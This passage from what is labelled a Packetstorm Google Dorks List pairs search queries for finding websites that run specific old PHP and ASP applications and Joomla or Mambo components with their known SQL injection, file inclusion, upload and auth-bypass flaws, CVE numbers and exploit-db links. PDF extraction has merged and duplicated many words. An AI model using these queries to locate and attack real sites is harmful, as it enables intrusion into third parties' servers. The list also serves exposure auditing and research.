intitle:Mp3ToolBox 1.0 intitle:Mp3 ToolBox 1.0

Mp3 ToolBox 1.0 beta 5 (skin_file)Remote File Inclusion Vulnerability -CVE: 2007-6139: http://www.exploit-db.com/exploits/4650

Powered by:Maian Greetingsv2.1

Powered by: Maian Greetings v2.1

Maian Greetings 2.1 Insecure CookieHandling Vulnerability - CVE: 2008-7086: http://www.exploit-db.com/exploits/6050

allinurl:"com_alberghi"detail

allinurl: "com_alberghi" detail

Joomla Component Alberghi 2.1.3 (id)SQL Injection Vulnerability - CVE:2008-1459: http://www.exploit-db.com/exploits/5278

"Powered ByphpBB Garage1.2.0"

"Powered By phpBB Garage 1.2.0"

phpBB Garage 1.2.0 Beta3 RemoteSQL Injection Vulnerability - CVE:2007-6223: http://www.exploit-db.com/exploits/4686

inurl:index.php?option=com_ynews inurl:index.php?option=com_ynews

Joomla Component Ynews 1.0.0 (id)Remote SQL Injection Vulnerability -CVE: 2008-0653: http://www.exploit-db.com/exploits/5072

"Powie's PSCRIPT "Powie's PSCRIPT MatchMaker Powies MatchMaker 4.05

Page 285: Packetstorm Google Dorks List

MatchMaker 4.05" 4.05" (matchdetail.php) SQL InjectionVulnerability - CVE: 2006-6039:http://www.exploit-db.com/exploits/2798

inurl:etkinlikbak.asp inurl:etkinlikbak.asp

Okul Web Otomasyon Sistemi 4.0.1Remote SQL Injection Vulnerability -CVE: 2007-0305: http://www.exploit-db.com/exploits/3135

"Copyright 2008ImenAfzar ver:2.0.0.0"

"Copyright 2008 ImenAfzar ver:2.0.0.0"

Namad (IMenAfzar) 2.0.0.0 RemoteFile Disclosure Vulnerability:http://www.exploit-db.com/exploits/8734

allinurl:com_comprofiler allinurl:com_comprofiler

Joomla Community Builder 1.0.1 BlindSQL Injection Vulnerability - CVE:2008-2093: http://www.exploit-db.com/exploits/5491

inurl:"com_joomlaradiov5" inurl:"com_joomlaradiov5"

Joomla Component joomlaradio v5Remote File Inclusion Vulnerability -CVE: 2007-4923: http://www.exploit-db.com/exploits/4401

"powered byphpAdBoard" "powered by phpAdBoard"

phpAdBoard (php uploads) ArbitraryFile Upload Vulnerability - CVE:2008-6921: http://www.exploit-db.com/exploits/7562

"Powered byQuick.Cms" "Powered by Quick.Cms"

Quick.Cms.Lite 0.5 (id) Remote SQLInjection Vulnerability - CVE: 2009-1410: http://www.exploit-db.com/exploits/8505

"Powered bywpQuiz"inurl:index.php

"Powered by wpQuiz"inurl:index.php

wpQuiz v2.7 Authentication BypassVulnerability - CVE: 2010-3608:http://www.exploit-db.com/exploits/15075

"Powered byUCStats version1.1"

"Powered by UCStats version 1.1"UCStats v1.1 SQL InjectionVulnerability: http://www.exploit-db.com/exploits/10891

"Powered byCCLeague Pro" "Powered by CCLeague Pro"

CCLeague Pro 1.2 Insecure CookieAuthentication Vulnerability - CVE:2008-5123: http://www.exploit-db.com/exploits/5888

intitle:BilderGalerie 1.1 orintitle:BilderGalerie

intitle:Bilder Galerie 1.1 orintitle:Bilder Galerie

MatPo Bilder Galerie 1.1 Remote FileInclusion Vulnerability - CVE: 2007-6649: http://www.exploit-db.com/exploits/4815

Page 286: Packetstorm Google Dorks List

"Powered by:PostGuestbook0.6.1"

"Powered by: PostGuestbook 0.6.1"

PHP-Nuke Module PostGuestbook0.6.1 (tpl_pgb_moddir) RFIVulnerability - CVE: 2007-1372:http://www.exploit-db.com/exploits/3423

"powered bysunshop" "powered by sunshop"

SunShop Shopping Cart 3.5 (abs_path)RFI Vulnerabilities - CVE: 2007-2070:http://www.exploit-db.com/exploits/3748

"SQuery 4.5"|"SQuery 4.0"|"SQuery 3.9" |inurl:"modules.php?name=SQuery"

"SQuery 4.5" |"SQuery 4.0"|"SQuery 3.9" |inurl:"modules.php?name=SQuery"

SQuery 4.5 (gore.php) Remote FileInclusion Vulnerability:http://www.exploit-db.com/exploits/2003

Powered bySkaDate Dating Powered by SkaDate Dating

SkaDate Online 5.0/6.0 Remote FileDisclosure Vulnerability - CVE: 2007-5299: http://www.exploit-db.com/exploits/4493

inurl:"ibasesite:de" inurl:"ibase site:de"

ibase 2.03 (download.php) Remote FileDisclosure Vulnerability - CVE: 2008-6288: http://www.exploit-db.com/exploits/6126

"Powered bysNews" "Powered by sNews"

sNews v1.7 (index.php?category) SQLInjection Vulnerability - CVE: 2010-2926: http://www.exploit-db.com/exploits/14465

"Powered byGravy Media" "Powered by Gravy Media"

Gravy Media Photo Host 1.0.8 LocalFile Disclosure Vulnerability - CVE:2009-2184: http://www.exploit-db.com/exploits/8996

inurl:"index.php?option=com_djiceshoutbox"

inurl:"index.php?option=com_djiceshoutbox"

Joomla Djice Shoutbox 1.0 PermanentXSS Vulnerability: http://www.exploit-db.com/exploits/8197

inurl:com_filiale inurl:com_filiale

Joomla Component Filiale 1.0.4(idFiliale) SQL Injection Vulnerability- CVE: 2008-1935: http://www.exploit-db.com/exploits/5488

"Powered By AVArcade" "Powered By AV Arcade"

AV Arcade 2.1b (index.php id) RemoteSQL Injection Vulnerability - CVE:2007-3563: http://www.exploit-db.com/exploits/4138

Powered byNATTERCHAT v Powered by NATTERCHAT v 1.1 NatterChat 1.1 (Auth Bypass) Remote

SQL Injection Vulnerability - CVE:

Page 287: Packetstorm Google Dorks List

1.1 2008-7049: http://www.exploit-db.com/exploits/7172

ogrencimezunlar.php ogrencimezunlar.php

Okul Merkezi Portal 1.0 (ataturk.php)Remote File Include Vulnerability:http://www.exploit-db.com/exploits/3012

inurl:index.php?option=com_yanc"listid"

inurl:index.php?option=com_yanc"listid"

Joomla Component com_yanc SQLInjection Vulnerability:http://www.exploit-db.com/exploits/11603

Powered by6rbScript Powered by 6rbScript

6rbScript (news.php newsid) RemoteSQL Injection Vulnerability:http://www.exploit-db.com/exploits/5663

powered by vpaspv 6.50 powered by vpasp v 6.50

VP-ASP Shopping Cart 6.50 DatabaseDisclosure Vulnerability - CVE: 2008-5929: http://www.exploit-db.com/exploits/7438

allinurl:"/questcms/" allinurl:"/questcms/"

QuestCMS (main.php) Remote FileInclude Vulnerability:http://www.exploit-db.com/exploits/2137

inurl:com_eQuotes inurl:com_eQuotes

Joomla Component equotes 0.9.4Remote SQL injection Vulnerability -CVE: 2008-2628: http://www.exploit-db.com/exploits/5723

"Upload unique IPList:" AND "TheUltimate Fake HitGenerator -BOOST YOURALEXA RANK"

"Upload unique IP List:" AND "TheUltimate Fake Hit Generator -BOOST YOUR ALEXA RANK"

Fake Hit Generator 2.2 Shell UploadVulnerability: http://www.exploit-db.com/exploits/10230

"Powered byXplode CMS" "Powered by Xplode CMS"

Xplode CMS (wrap_script) RemoteSQL Injection Vulnerability:http://www.exploit-db.com/exploits/8373

Powered byJewelry CartSoftware

Powered by Jewelry Cart Software

Jewelry Cart Software (product.php)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/11826

inurl:com_cpg inurl:com_cpgMambo CopperminePhotoGaleryComponent Remote IncludeVulnerability - CVE: 2006-4321:

Page 288: Packetstorm Google Dorks List

http://www.exploit-db.com/exploits/2196

inurl:ratelink.php?lnkid= inurl:ratelink.php?lnkid=

Link Trader (lnkid) Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/10834

"CNStats 2.9" "CNStats 2.9"

CNStats 2.9 (who_r.php bj) RemoteFile Inclusion Vulnerability - CVE:2007-2086: http://www.exploit-db.com/exploits/3741

"Browse withInteractive Map" "Browse with Interactive Map"

PHP Real Estate (fullnews.php id)Remote SQL Injection Vulnerability -CVE: 2007-6462: http://www.exploit-db.com/exploits/4737

intext:"PoweredByAzaronline.com"

intext:"Powered ByAzaronline.com"

Azaronline Design SQL InjectionVulnerability: http://www.exploit-db.com/exploits/15391

Powered byephpscripts Powered by ephpscripts

E-Shop Shopping Cart Script(search_results.php) SQL InjectionVuln - CVE: 2008-5838:http://www.exploit-db.com/exploits/6398

"powered by BlogSystem" "powered by Blog System"

Blog System 1.x (note) SQL InjectionVuln - CVE: 2010-0458:http://www.exploit-db.com/exploits/11216

"Powered byDWdirectory" "Powered by DWdirectory"

DWdirectory 2.1 Remote SQLInjection Vulnerability - CVE: 2007-6392: http://www.exploit-db.com/exploits/4708

"2005 www.frank-karau.de" | "2006www.frank-karau.de"

"2005 www.frank-karau.de" | "2006www.frank-karau.de"

GL-SH Deaf Forum 6.4.4 Local FileInclusion Vulnerabilities - CVE: 2007-3535: http://www.exploit-db.com/exploits/4124

inurl:jgs_treffen.php inurl:jgs_treffen.php

Woltlab Burning Board Addon JGS-Treffen SQL Injection Vulnerability -CVE: 2008-1640: http://www.exploit-db.com/exploits/5329

"Powered bySoftbizScripts"inurl:"searchresult.php?sbcat_id="

"Powered by SoftbizScripts"inurl:"searchresult.php?sbcat_id="

Softbiz Recipes Portal Script RemoteSQL Injection Vulnerability - CVE:2007-5449: http://www.exploit-db.com/exploits/4527

Page 289: Packetstorm Google Dorks List

Powered bySNETWORKSPHPCLASSIFIEDS

Powered by SNETWORKS PHPCLASSIFIEDS

SNETWORKS PHP CLASSIFIEDS5.0 Remote File InclusionVulnerability - CVE: 2008-0137:http://www.exploit-db.com/exploits/4838

inurl:Editor/assetmanager/assetmanager.asp

inurl:Editor/assetmanager/assetmanager.asp

Asset Manager Remote File uploadVulnerability: http://www.exploit-db.com/exploits/12693

inurl:makaledetay.asp?id= inurl:makaledetay.asp?id=

Mayasan Portal v2.0 (makaledetay.asp)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/14420

inurl:"ir/addlink.php?id=" ORinurl:"addlink.php?id="

inurl:"ir/addlink.php?id=" ORinurl:"addlink.php?id="

list Web (addlink.php id) Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/10838

inurl: Powered byTraidnt UPVersion 1.0.

inurl: Powered by Traidnt UPVersion 1.0.

Traidnt UP Version 1.0 Remote FileUpload Vulnerability:http://www.exploit-db.com/exploits/8006

inurl:"com_linkr" inurl:"com_linkr"Joomla Component com_linkr - LocalFile Inclusion: http://www.exploit-db.com/exploits/11756

inurl:"com_janews" inurl:"com_janews"

Joomla Component com_janews -Local File Inclusion - CVE: 2010-1219: http://www.exploit-db.com/exploits/11757

inurl:"com_sectionex" inurl:"com_sectionex"

Joomla Component com_sectionex -Local File Inclusion:http://www.exploit-db.com/exploits/11759

inurl:"com_rokdownloads" inurl:"com_rokdownloads"

Joomla Componentcom_rokdownloads - Local FileInclusion - CVE: 2010-1056:http://www.exploit-db.com/exploits/11760

inurl:"com_ganalytics" inurl:"com_ganalytics"

Joomla Component com_ganalytics -Local File Inclusion:http://www.exploit-db.com/exploits/11758

inurl:/phpfootball/ inurl:/phpfootball/PHPFootball 1.6 (show.php) RemoteDatabase Disclosure Vulnerability -CVE: 2007-0638: http://www.exploit-

Page 290: Packetstorm Google Dorks List

db.com/exploits/3226

"Search AdultDirectory:" "Search Adult Directory:"

Adult Directory (cat_id) Remote SQLInjection Vulnerability - CVE: 2007-4056: http://www.exploit-db.com/exploits/4238

inurl:forum_answer.php?que_id inurl:forum_answer.php?que_id

AlstraSoft AskMe Pro 2.1(profile.php?id) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14986

allinurl:index.php?act=publ allinurl:index.php?act=publ

Qwerty CMS (id) Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/8104

inurl:"com_cartweberp" inurl:"com_cartweberp"

Joomla Component com_cartweberpLFI Vulnerability - CVE: 2010-0982:http://www.exploit-db.com/exploits/10942

"PHPAuction GPLEnhanced V2.51byAuctionCode.com"

"PHPAuction GPL Enhanced V2.51by AuctionCode.com"

Auction_Software Script Admin LoginBypass vulnerability:http://www.exploit-db.com/exploits/14247

inurl:com_doqment inurl:com_doqment

Joomla Component com_doqment (cid)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/10965

intext:PHPhotoalbum v0.5 intext:PHPhotoalbum v0.5

PHPhotoalbum 0.5 Multiple RemoteSQL Injection Vulnerabilities - CVE:2008-2501: http://www.exploit-db.com/exploits/5683

"Powered byOnePound" "Powered by OnePound"

onepound shop 1.x products.php SQLInjection Vulnerability:http://www.exploit-db.com/exploits/9138

"Powered By :Yamamah Version1.00"

"Powered By : Yamamah Version1.00"

Yamamah Photo Gallery 1.00(download.php) Local File DisclosureVulnerability - CVE: 2010-2334:http://www.exploit-db.com/exploits/13856

"powered bySnoGrafx" "powered by SnoGrafx"

SnoGrafx (cat.php?cat) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14523

Page 291: Packetstorm Google Dorks List

allinurl:"xGb.php" allinurl:"xGb.php"

xGB 2.0 (xGB.php) RemotePermission Bypass Vulnerability -CVE: 2007-4637: http://www.exploit-db.com/exploits/4336

"Powered byForumApp" "Powered by ForumApp"

ForumApp 3.3 Remote DatabaseDisclosure Vulnerability - CVE: 2008-6147: http://www.exploit-db.com/exploits/7599

inurl:/component/jeeventcalendar/ inurl:/component/jeeventcalendar/

Joomla JE Event Calendar LFIVulnerability: http://www.exploit-db.com/exploits/14062

allinurl: page_idalbum "photo" allinurl: page_id album "photo"

Wordpress Photo album Remote SQLInjection Vulnerability - CVE: 2008-0939: http://www.exploit-db.com/exploits/5135

"Powered bybeamospetition1.0.12"

"Powered by beamospetition1.0.12"

Joomla Component beamospetition1.0.12 SQL Injection / XSS - CVE:2009-0378: http://www.exploit-db.com/exploits/7847

"Powered by68kb" "Powered by 68kb"

68kb Knowledge Base Script v1.0.0rc2Search SQL Injection:http://www.exploit-db.com/exploits/11925

intext:"poweredand designed byDow Group"

intext:"powered and designed byDow Group"

Dow Group (new.php) SQL Injection:http://www.exploit-db.com/exploits/9491

"powered bydevalcms v1.4.a" "powered by devalcms v1.4.a"

devalcms 1.4a XSS / Remote CodeExecution - CVE: 2008-6982:http://www.exploit-db.com/exploits/6369

inurl:com_webring inurl:com_webring

Joomla Webring Component 1.0Remote Include Vulnerability - CVE:2006-4129: http://www.exploit-db.com/exploits/2177

inurl:hikaye.asp?id= inurl:hikaye.asp?id=

Caner Hikaye Script SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14419

intext:Design by:runtcommunications

intext:Design by: runtcommunications

runt-communications Design SQLInjection Vulnerability:http://www.exploit-db.com/exploits/12707

Copyright Agares Copyright Agares Media phpAutoVideo CSRF Vulnerability -

Page 292: Packetstorm Google Dorks List

Mediaphpautovideo

phpautovideo OSVDB-ID: 62450:http://www.exploit-db.com/exploits/11502

"Powered byDVHome.cn" "Powered by DVHome.cn"

PHP TopTree BBS 2.0.1a (right_file)Remote File Inclusion Vulnerability -CVE: 2007-2544: http://www.exploit-db.com/exploits/3854

intext:"powered byMilonic"inurl:viewnews.php?id=

intext:"powered by Milonic"inurl:viewnews.php?id=

Milonic News (viewnews) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/11031

"powered byExtCalendar v2" "powered by ExtCalendar v2"

com_extcalendar Mambo Component2.0 Include Vulnerability:http://www.exploit-db.com/exploits/2022

"Search | Invite |Mail | Blog |Forum"

"Search | Invite | Mail | Blog |Forum"

Myspace Clone Script (index.php)Remote File Inclusion Vulnerability -CVE: 2007-6057: http://www.exploit-db.com/exploits/4628

"AcmlmBoardv1.A2" "AcmlmBoard v1.A2"

AcmlmBoard 1.A2 (pow) Remote SQLInjection Vulnerability - CVE: 2008-5198: http://www.exploit-db.com/exploits/5969

inurl:index.php?option=com_mambads

inurl:index.php?option=com_mambads

Mambo Component com_mambadsSQL Injection Vulnerability:http://www.exploit-db.com/exploits/11719

inurl:"modules.php?name=My_eGallery"

inurl:"modules.php?name=My_eGallery"

PHP-Nuke My_eGallery 2.7.9 RemoteSQL Injection Vulnerability - CVE:2008-7038: http://www.exploit-db.com/exploits/5203

"MarketplaceVersion 1.1.1" "Marketplace Version 1.1.1"

Joomla Component Marketplace 1.1.1SQL Injection Vulnerability - CVE:2008-0689: http://www.exploit-db.com/exploits/5055

"Powered by AjaxPortal 3.0" "Powered by Ajax Portal 3.0"

MyioSoft Ajax Portal 3.0 (AuthBypass) SQL Injection Vulnerability -CVE: 2008-5653: http://www.exploit-db.com/exploits/7044

"Powered ByIP.Board 3.0.0Beta 5"

"Powered By IP.Board 3.0.0 Beta5"

Invision Power Board 3.0.0b5 ActiveXSS & Path Disclosure Vulns:http://www.exploit-db.com/exploits/8538

Page 293: Packetstorm Google Dorks List

"MunzurSoft WepPortal W3" "MunzurSoft Wep Portal W3"

MunzurSoft Wep Portal W3 (kat) SQLInjection Vulnerability - CVE: 2008-4573: http://www.exploit-db.com/exploits/6725

Powered by BloxCMS fromTownNews.com

Powered by Blox CMS fromTownNews.com

Blox CMS SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12729

allinurl :"wp-content/plugins/st_newsletter"

allinurl :"wp-content/plugins/st_newsletter"

Wordpress Plugin st_newsletterRemote SQL Injection Vulnerability -CVE: 2008-0683: http://www.exploit-db.com/exploits/5053

inurl:"links_showcat.php?" inurl:"links_showcat.php?"

Dlili Script SQL InjectionVulnerability: http://www.exploit-db.com/exploits/11318

Powered by SH-News 3.0 Powered by SH-News 3.0

SH-News 3.0 (comments.php id)Remote SQL Injection Vulnerability -CVE: 2007-6391: http://www.exploit-db.com/exploits/4709

"CaLogicCalendars V1.2.2" "CaLogic Calendars V1.2.2"

CaLogic Calendars 1.2.2 (langsel)Remote SQL Injection Vulnerability -CVE: 2008-2444: http://www.exploit-db.com/exploits/5607

inurl:"com_pollxt" inurl:"com_pollxt"

pollxt Mambo Component 1.22.07Remote Include Vulnerability - CVE:2006-5045: http://www.exploit-db.com/exploits/2029

Powered by PHPLinks fromDeltaScripts

Powered by PHP Links fromDeltaScripts

PHP Links 1.3 (vote.php id) RemoteSQL Injection Vulnerability - CVE:2008-0565: http://www.exploit-db.com/exploits/5021

inurl:index.php?option=com_calendario

inurl:index.php?option=com_calendario

Joomla Component com_calendarioBlind SQL injection Vulnerability:http://www.exploit-db.com/exploits/10760

Powered byPNphpBB2 /Powered porPNphpBB2

Powered by PNphpBB2 / Poweredpor PNphpBB2

PNphpBB2 1.2g (phpbb_root_path)Remote File Include Vulnerability -CVE: 2006-4968: http://www.exploit-db.com/exploits/2390

"Powered byNukedit" "Powered by Nukedit"

Nukedit 4.9.8 Remote DatabaseDisclosure Vulnerability - CVE: 2008-5773: http://www.exploit-db.com/exploits/7491

Page 294: Packetstorm Google Dorks List

Powered by "vcart3.3.2" Powered by "vcart 3.3.2"

vcart 3.3.2 Multiple Remote FileInclusion Vulnerabilities - CVE: 2008-0287: http://www.exploit-db.com/exploits/4889

Powered bySkaLinks Powered by SkaLinks

SkaLinks 1.5 (Auth Bypass) SQLInjection Vulnerability - CVE: 2009-0451: http://www.exploit-db.com/exploits/7932

"mirco blogging" "mirco blogging"

x10 mirco blogging V121 SQLInjection Vulnerability:http://www.exploit-db.com/exploits/12042

inurl:"nabopoll/" inurl:"nabopoll/"

nabopoll 1.2 (survey.inc.php path)Remote File Include Vulnerability -CVE: 2005-2157: http://www.exploit-db.com/exploits/3315

allinurl:"modules/eblog" allinurl :"modules/eblog"

eXV2 Module eblog 1.2 (blog_id)Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5253

Powered ByDataLife Engine Powered By DataLife Engine

DataLife Engine 8.2 dle_config_apiRemote File Inclusion Vulnerability -CVE: 2009-3055: http://www.exploit-db.com/exploits/9572

AlstraSoft Web"ESE" AlstraSoft Web "ESE"

AlstraSoft Web Email Script Enterprise(id) SQL Injection Vuln - CVE: 2008-5751: http://www.exploit-db.com/exploits/7596

Powered by MaianCart v1.1 Powered by Maian Cart v1.1

Maian Cart 1.1 Insecure CookieHandling Vulnerability:http://www.exploit-db.com/exploits/6047

eXV2MyAnnonces eXV2 MyAnnonces

eXV2 Module MyAnnonces (lid)Remote SQL Injection Vulnerability -CVE: 2008-1406: http://www.exploit-db.com/exploits/5252

"BlogMe PHPcreated by GammaScripts"

"BlogMe PHP created by GammaScripts"

BlogMe PHP (comments.php id) SQLInjection Vulnerability - CVE: 2008-2175: http://www.exploit-db.com/exploits/5533

inurl:"/go/_files/?file=" inurl:"/go/_files/?file="

SOTEeSKLEP 3.5RC9 (file) RemoteFile Disclosure Vulnerability - CVE:2007-4369: http://www.exploit-

Page 295: Packetstorm Google Dorks List

db.com/exploits/4282

inurl:"option=com_camelcitydb2" inurl:"option=com_camelcitydb2"

Joomla CamelcityDB 2.2 SQLInjection Vulnerability:http://www.exploit-db.com/exploits/14530

Powered byPacerCMS Powered by PacerCMS

PacerCMS 0.6 (last_module) RemoteCode Execution Vulnerability - CVE:2007-5056: http://www.exploit-db.com/exploits/5098

inurl:com_expshop inurl:com_expshop

Joomla Component EXP Shop (catid)SQL Injection Vulnerability - CVE:2008-2892: http://www.exploit-db.com/exploits/5893

intitle:"ITechBids" intitle:"ITech Bids"

ITechBids 5.0 (bidhistory.php item_id)Remote SQL Injection Vulnerability -CVE: 2008-0692: http://www.exploit-db.com/exploits/5056

Powered by CS-Cart - ShoppingCart Software

Powered by CS-Cart - ShoppingCart Software

CS-Cart 1.3.3 (classes_dir) RemoteFile Include Vulnerability - CVE:2006-2863: http://www.exploit-db.com/exploits/1872

inurl:com_colophon inurl:com_colophon

Mambo Colophon Component 1.2Remote Inclusion Vulnerability - CVE:2006-3969: http://www.exploit-db.com/exploits/2085

" Powered by JTL-Shop 2" " Powered by JTL-Shop 2"

JTL-Shop 2 (druckansicht.php) SQLInjection Vulnerability - CVE: 2010-0691: http://www.exploit-db.com/exploits/11445

"Powered by PHPShop fromDeltaScripts"

"Powered by PHP Shop fromDeltaScripts"

DeltaScripts PHP Shop 1.0 (AuthBypass) SQL Injection Vulnerability -CVE: 2008-5648: http://www.exploit-db.com/exploits/7025

"Powered bysNews "inurl:index.php?id=

"Powered by sNews "inurl:index.php?id=

sNews (index.php) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14458

"Torbstoff News4" "Torbstoff News 4"

Torbstoff News 4 (pfad) Remote FileInclusion Vulnerability - CVE: 2006-4045: http://www.exploit-db.com/exploits/2121

intext:Powered by intext:Powered by MX-System MX-System 2.7.3 (index.php page)

Page 296: Packetstorm Google Dorks List

MX-System 2.7.3 2.7.3 Remote SQL Injection Vulnerability -CVE: 2008-2477: http://www.exploit-db.com/exploits/5659

"Powered By4smart" "Powered By 4smart"

Magician Blog 1.0 (Auth Bypass) SQLinjection Vulnerability:http://www.exploit-db.com/exploits/9283

intext:"Poweredby ArcadeBuilder"

intext:"Powered by Arcade Builder"

ArcadeBuilder Game Portal Manager1.7 Remote SQL Injection Vuln - CVE:2007-3521: http://www.exploit-db.com/exploits/4133

"intext:Warning:passthru()""inurl:view=help"

"intext:Warning: passthru()""inurl:view=help"

PTC Site's RCE/XSS Vulnerability:http://www.exploit-db.com/exploits/12808

inurl:"index.php?id_menu=" inurl:"index.php?id_menu="

CMScontrol 7.x File Upload:http://www.exploit-db.com/exploits/11104

Powered ByCoppermine PhotoGallery v1.2.2b/Powered ByCoppermine

Powered By Coppermine PhotoGallery v1.2.2b /Powered ByCoppermine

Coppermine Photo Gallery 1.2.2b(Nuke Addon) Include Vulnerability:http://www.exploit-db.com/exploits/2375

"powered byNabernet" "powered by Nabernet"

Nabernet (articles.php) Sql InjectionVulnerability: http://www.exploit-db.com/exploits/11482

"Powered by VSPANEL 7.5.5" "Powered by VS PANEL 7.5.5"

http://www.exploit-db.com/exploits/9171 - CVE: 2009-3595: http://www.exploit-db.com/exploits/9171

"powered byeasytrade" "powered by easytrade"

easyTrade 2.x (detail.php id) RemoteSQL Injection Vulnerability - CVE:2008-2790: http://www.exploit-db.com/exploits/5840

inurl:"articles.php?topic=" inurl:"articles.php?topic="

jPORTAL 2.3.1 articles.php RemoteSQL Injection Vulnerability - CVE:2007-5973: http://www.exploit-db.com/exploits/4614

inurl:"classifieds.php?op=detail_adverts"

inurl:"classifieds.php?op=detail_adverts"

PHP-Fusion Mod classifieds (lid)Remote SQL Injection Vulnerability -CVE: 2008-5197: http://www.exploit-db.com/exploits/5961

"Emefa Guestbook "Emefa Guestbook V 3.0" Emefa Guestbook 3.0 Remote

Page 297: Packetstorm Google Dorks List

V 3.0" Database Disclosure Vulnerability -CVE: 2008-5852: http://www.exploit-db.com/exploits/7534

powered by webit!cms powered by webit! cms

Webit Cms SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12744

inurl:"char.php?id=" ORintitle:Minimanager for trinity server

inurl:"char.php?id=" ORintitle:Minimanager for trinityserver

http://www.exploit-db.com/exploits/12554:http://www.exploit-db.com/exploits/12554

"wow rosterversion 1.*" "wow roster version 1.*"

WoW Roster 1.70 (/lib/phpbb.php)Remote File Include Vulnerability:http://www.exploit-db.com/exploits/2109

inurl:com_DTRegister eventId inurl:com_DTRegister eventId

Joomla Component DT RegisterRemote SQL injection Vulnerability -CVE: 2008-3265: http://www.exploit-db.com/exploits/6086

"wow rosterversion 1.5.*" "wow roster version 1.5.*"

WoW Roster 1.5.1 (subdir) RemoteFile Include Vulnerability - CVE:2006-3998: http://www.exploit-db.com/exploits/2099

Powered by freesimple software Powered by free simple software

Free Simple Software v1.0 Remote FileInclusion Vulnerability - CVE: 2010-3307: http://www.exploit-db.com/exploits/14672

"TR Newsportal"brought by TRanx.

"TR Newsportal" brought byTRanx.

TR Newsportal 0.36tr1 (poll.php)Remote File Inclusion Vulnerability -CVE: 2006-2557: http://www.exploit-db.com/exploits/1789

Powered byMinerva 237 Powered by Minerva 237

Minerva 2.0.8a Build 237(phpbb_root_path) File IncludeVulnerability - CVE: 2006-3028:http://www.exploit-db.com/exploits/1908

"Powered ByW3infotech" "Powered By W3infotech"

W3infotech ( Auth Bypass ) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/10222

inurl:"option=com_org" inurl:"option=com_org"

Joomla Component com_org SQLInjection Vulnerability:http://www.exploit-db.com/exploits/11725

Page 298: Packetstorm Google Dorks List

"Powered byGameSiteScript" "Powered by GameSiteScript"

GameSiteScript 3.1 (profile id) RemoteSQL Injection Vulnerability - CVE:2007-3631: http://www.exploit-db.com/exploits/4159

Powered by: Con-Imedia Powered by: Con-Imedia

IMEDIA (index.php) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12665

(c) SriptBux 2008 |Powered ByScriptBux version2.50 beta 1

(c) SriptBux 2008 | Powered ByScriptBux version 2.50 beta 1

Bux.to Clone Script Insecure CookieHandling Vulnerability - CVE: 2008-6162: http://www.exploit-db.com/exploits/6652

"powered by twg" "powered by twg"

TinyWebGallery 1.5 (image) RemoteInclude Vulnerabilities - CVE: 2006-4166: http://www.exploit-db.com/exploits/2158

allinurl:/phpress/ allinurl:/phpress/

phpress 0.2.0 (adisplay.php lang) LocalFile Inclusion Vulnerability:http://www.exploit-db.com/exploits/4382

"Powered bysendcard - anadvanced PHP e-card program" -site:sendcard.org

"Powered by sendcard - anadvanced PHP e-card program" -site:sendcard.org

Sendcard 3.4.1 (sendcard.php form)Local File Inclusion Vulnerability -CVE: 2007-2471: http://www.exploit-db.com/exploits/3827

intext: "Poweredby Marinet" intext: "Powered by Marinet"

Marinet cms SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12575

UPublisher UPublisher

UPublisher 1.0 (viewarticle.asp)Remote SQL Injection Vulnerability -CVE: 2006-5888: http://www.exploit-db.com/exploits/2765

intitle:"AnswerBuilder" Ask aquestion

intitle:"Answer Builder" Ask aquestion

Expert Advisior (index.php id) RemoteSQL Injection Vulnerbility - CVE:2007-3882: http://www.exploit-db.com/exploits/4189

inurl:"tinybrowser.php?" inurl:"tinybrowser.php?"

TinyBrowser Remote File uploadVulnerability: http://www.exploit-db.com/exploits/12692

inurl:"product_desc.php?id="Powered byZeeways.com

inurl:"product_desc.php?id="Powered by Zeeways.com

ZeeWays Script SQL InjectionVulnerability: http://www.exploit-db.com/exploits/11087

Page 299: Packetstorm Google Dorks List

"Powered byECShop v2.5.0" "Powered by ECShop v2.5.0"

ECShop 2.5.0 (order_sn) Remote SQLInjection Vulnerability - CVE: 2009-1622: http://www.exploit-db.com/exploits/8548

"powered byPhoto-GraffixFlash ImageGallery"

"powered by Photo-Graffix FlashImage Gallery"

Photo Graffix 3.4 Multiple RemoteVulnerabilities: http://www.exploit-db.com/exploits/8372

"inc_webblogmanager.asp" "inc_webblogmanager.asp"

DMXReady Registration Manager 1.1Arbitrary File Upload Vulnerability -CVE: 2009-2238: http://www.exploit-db.com/exploits/8749

inurl:tr.php?id= inurl:tr.php?id=

Downline Goldmine Category Addon(id) SQL Injection Vulnerability:http://www.exploit-db.com/exploits/6947

inurl:index.php?mod=jeuxflash inurl:index.php?mod=jeuxflash

KwsPHP Module jeuxflash (cat)Remote SQL Injection Vulnerability -CVE: 2008-1759: http://www.exploit-db.com/exploits/5352

allinurl:"modules/gallery" allinurl :"modules/gallery"

XOOPS Module Gallery 0.2.2 (gid)Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5241

intext:"Design byMMA Creative" intext:"Design by MMA Creative"

MMA Creative Design SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12706

inurl:tr.php?id= inurl:tr.php?id=

Downline Goldmine Builder (tr.php id)Remote SQL Injection Vulnerability -CVE: 2008-4178: http://www.exploit-db.com/exploits/6946

''com_noticias'' ''com_noticias''

Joomla Component com_noticias 1.0SQL Injection Vulnerability - CVE:2008-0670: http://www.exploit-db.com/exploits/5081

"MobPartnerCounter" "uploadfiles"

"MobPartner Counter" "uploadfiles"

MobPartner Counter - Remote FileUpload Vulnerability:http://www.exploit-db.com/exploits/11019

allinurl:"modules/glossaires"

allinurl: "modules/glossaires"

XOOPS Module Glossario 2.2 (sid)Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5216

Page 300: Packetstorm Google Dorks List

inurl:com_netinvoice inurl:com_netinvoice

